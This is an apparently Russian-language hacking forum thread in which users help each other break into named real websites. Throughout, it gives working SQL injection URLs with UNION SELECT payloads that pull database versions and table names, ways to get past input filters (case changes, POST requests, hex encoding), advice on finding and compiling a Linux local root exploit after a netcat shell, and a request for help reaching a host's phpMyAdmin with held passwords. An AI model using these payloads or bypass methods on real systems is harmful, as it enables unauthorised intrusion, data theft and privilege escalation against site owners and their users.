http://www.steadygroup.com/articledetails.php?id=314+and+substring(version(),1,1)>1 Как эту расскрутить? Тут скобки фильтруются, чтоли?
Да, режет скобки (обе) и звездочки тоже (причем граммотно режет, захексенные тоже) Так, может пригодится: http://www.steadygroup.com/articledetails.php?id=-314+or+1=0 http://www.steadygroup.com/articledetails.php?id=-314+or+1=1 В качестве фильтра вроде # катит
5 версия.... есть information_schema PHP: http://www.steadygroup.com/articledetails.php?id=-314+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,TABLE_NAME,28+FROM+information_schema.tables--+
А что, без скобок уже скули не модно крутить? http://www.steadygroup.com/articledetails.php?id=-314%20UNION%20SELECT%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- http://www.steadygroup.com/articledetails.php?id=-314%20UNION%20SELECT%201,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+information_schema.tables--
http://www.google.com/search?hl=ru&client=opera&rls=ru&hs=OuP&num=100&q=2.6.28+local+root+exploit&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr=
Ни одного под эту версию не увидел! Я гуглил по этому запросу, ничего толком не обнаружил, поэтому и спрашивал, необходим сплоит именно под версию Linux 2.6.28, или можно и 2.6.x ???? Так ничего и не вывалилось... =( И ещё вопрос, забиндил, подконнектился неткатом, проверяю > which gcc выдаёт which: no gcc in (/bin:/usr/bin) как быть? =( Как можно ещё поднять права до рута?
Поищи тут http://milw0rm.com/search.php - введи в поиск Linux http://milw0rm.com/exploits/5093 отпиши плз если получится каким сплойтом.... если нет возможности скомпелировать на этой машине сплойт - можно на другой linux'овой машине. Да и в винде можно - лишь бы все библиотеки были. Есть такой компилятор lccwin32. им можно попробовать. Потом заливаешь бинарник и исполняешь.
Если хостер при вводе FROM перекидывает с сайту на траницу где бла бла бла вы хакер Как можно обойти?
Byrger Не знаю как насчёт "бла бла бла вы хакер", но например СпейсВеб при реагирует на "union select from" и выбрасывает вот сюда: http://sweb.ru/insecure Это обходится POST, разумеется если это возможно. Если ты о чём то другом, то нужно смотреть что именно фильтруется, пробовать POST, возможно фильтрация только с пробелом , как реагирует на регистр и т.д. Вариантов масса.
если открыл info.php что я могу оттуда почерпнуть для sql иньекции: mysql MySQL Support enabled Active Persistent Links 0 Active Links 0 Client API version 5.0.67 MYSQL_MODULE_TYPE external MYSQL_SOCKET /tmp/mysql.sock MYSQL_INCLUDE -I/usr/local/include/mysql MYSQL_LIBS -L/usr/local/lib/mysql -lmysqlclient
Дальше только перебор ибо 4 ветка без доступа к mysql и как правило file_priv в N: http://all-perfumes.com.ua/index.php?act=publ&id=-39+union+select+1,2,3,4,unhex(hex(concat_ws(0x3A,user(),@@version,database())))
http://all-perfumes.com.ua/index.php?act=publ&id=-39+union+select+1,2,3,4,unhex(hex(version()))-- почему в unhex(hex(version()))? Потому что, когда мы ставим просто version() вылетает ошибка. Будем кодировать) Версия 4, т.е. таблицы через information_schema найти не получится =( Проверим file_priv, стандартные таблицы... Ничего не нашел =( Даже побрутил и ничего не вышло( Но зато это агенство всем наклепало свои уязвимые движки =) Смотрит сайты тут: http://www.web-sites.kiev.ua/portfolio.php Ошибки тут: index.php?act=goods&id=7'&gid=11 index.php?act=page&p=2' Если найти таблицы, то можно писать сплоит) P.S: А я вот решил глянуть мой именно домен) http://tigger.com/inspirations/install.php?error=true - вот итог =) Хм... Я так понимаю, что это /install/ но почему-то дальше не хочет =( может есть вариант какой-нибудь)?
сегодня столкнулся с такой проблемой: через group by определил кол колонок... а когда уже пишут +union+select..... слово union заменяется на "тра та та" как эту хрень обойти?
попробуй регистр букв менять, например UniOn UNiON, а если там нормальная фильтрация, то болт и тебе придётся использовать блайнд-скул.
Вопрос не по уязмимость но задам сюда: Где находится PhpMyAdmin у хостинга www.infobox.ru Просто есть сайт у которого знаю пассы от MySQL а зайти туда только с локала похоже можно (в файле конфига у сайта хост прописан: "mysqlserver") Кто пользуется этим хостингом или просто знает где у них можно зайти, напишите плиз.
